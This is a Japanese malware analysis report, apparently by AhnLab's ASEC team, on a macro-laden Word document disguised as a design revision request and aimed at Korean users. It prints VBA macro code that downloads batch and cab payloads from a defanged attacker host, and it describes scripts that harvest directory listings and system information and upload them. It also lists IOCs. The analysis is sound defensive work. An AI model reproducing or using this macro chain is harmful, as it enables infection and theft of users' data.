デザイン修正リクエストのドキュメントに偽装した情報窃取目的の不正な Word

ASEC 分析チームは、韓国国内ユーザーをターゲットにした不正な Word ドキュメントが拡散していることを確認した。ファイル名は デザイン修正リクエスト.doc であり、以下のようにマクロの実行を誘導する画像が含まれている。

図1.Word ドキュメント内の画像
図2.デザイン修正リクエスト.doc のドキュメント情報

この Word ファイル内部には以下のように hxxp://filedownloaders.com/doc09 から追加ファイルをダウンロードする不正なマクロが含まれている。ユーザーがコンテンツの有効化ボタンをクリックすると、マクロが自動で実行され、追加の不正なファイルをダウンロードする。

Sub Document_Open()
    Dim RetVal As Long
    
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

その後、ダウンロードした temp.doc ドキュメントファイルを実行する。この Word ドキュメントは、以下のように韓国国内の企業を騙る内容を含んでいる。

図3.temp.doc の本文内容
図4.temp.doc のドキュメント情報

temp.doc には先にダウンロードした no1.bat ファイルを実行させるマクロが含まれている。

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

Word ファイルによって実行された no1.bat は vvire.bat を実行させる。vvire.bat が存在しない場合、hxxp://filedownloaders.com/doc09/vbs6.txt からダウンロードした setup.cab ファイルの圧縮を解凍したあと、vvire.bat を実行する。

図3.no1.bat ファイルの中身

vvire.bat はレジストリ登録および no4.bat ファイルの実行、追加ファイルのダウンロード機能を実行する。

図4.vvire.bat ファイルの中身

Start.vbs ファイルをレジストリに登録して vvire.bat ファイルが自動で実行されるようにし、no4.bat の実行後に no1.bat を削除する。以降は特定のファイルが存在するかを確認し hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt から追加ファイルをダウンロード、および実行する。現在、当該ファイルの場合はダウンロードが行われないため、確認が不可能である。

Start.vbs ファイルは以下の通りである。

図5.star.vbs ファイルの中身

vvire.bat を通じて実行された no4.bat では、以下のようなユーザー PC の情報を収集して hxxp://senteroman.com/upl11/upload.php に流出させる機能を実行する。

  • C:\Users\%username%\downloads\ リスト
  • C:\Users\%username%\documents\ リスト
  • C:\Users\%username%\desktop\ リスト
  • C:\Program Files\ リスト
  • IP 情報
  • tasklist
  • systeminfo

no4.bat の実行時、C:\Users\Public\Documents\ フォルダーに以下のように収集された情報が含まれたファイルが生成され、収集した情報をアップロードしたときに upok.txt ファイルを生成する。

図6.生成されたファイルリスト

このマルウェアのように、ドキュメント内部にマクロの有効化を誘導し、正規のユーザーを詐称する本文内容を持つマルウェアは拡散が続いているため、ユーザーの注意が必要である。また、ドキュメントに含まれるマクロが自動で実行されないように設定し、疑わしいドキュメントは閲覧しないようにしなければならない。

[V3 検知]

  • Downloader/DOC.Generic

[関連 IOC 情報]

  • d6358ce7399df51138f89c74f408c5a9
  • dc7fda2a036016cca23f2867e644682c
  • d2732f2c6f8531e812053e6252c421cf
  • 66384f5091583b0c389918d5c8522cd6
  • hxxp://senteroman.com/upl11/upload.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments